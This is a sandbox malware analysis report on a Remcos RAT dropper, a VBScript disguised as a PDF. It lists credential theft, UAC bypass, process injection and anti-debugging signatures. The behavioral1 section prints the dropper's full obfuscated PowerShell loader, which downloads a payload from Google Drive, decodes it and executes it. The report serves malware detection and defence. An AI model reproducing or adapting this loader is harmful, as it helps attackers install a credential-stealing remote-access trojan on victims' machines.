Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-kzftgazqhm
Target 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs
SHA256 2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a
Tags
execution remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a

Threat Level: Known bad

The file 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

execution remcos remotehost collection credential_access discovery evasion rat stealer trojan

Remcos family

Remcos

UAC bypass

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 09:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 09:02

Reported

2024-11-11 09:04

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? 
skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE 
cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. 
beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabE562.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2724-20-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp

memory/2724-21-0x000000001B270000-0x000000001B552000-memory.dmp

memory/2724-22-0x0000000002360000-0x0000000002368000-memory.dmp

memory/2724-23-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-24-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-26-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-25-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-27-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-28-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-29-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp

memory/2724-30-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-31-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-32-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2724-33-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 09:02

Reported

2024-11-11 09:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Detected Nirsoft tools

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2400 set thread context of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 set thread context of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 set thread context of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1076 wrote to memory of 4528 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4528 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1468 wrote to memory of 2400 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1468 wrote to memory of 2400 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 2400 wrote to memory of 4924 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 1680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 1680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 4924 wrote to memory of 1680 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2400 wrote to memory of 2548 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2400 wrote to memory of 2548 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2684 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2684 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2400 wrote to memory of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 1760 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2400 wrote to memory of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2548 wrote to memory of 2304 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
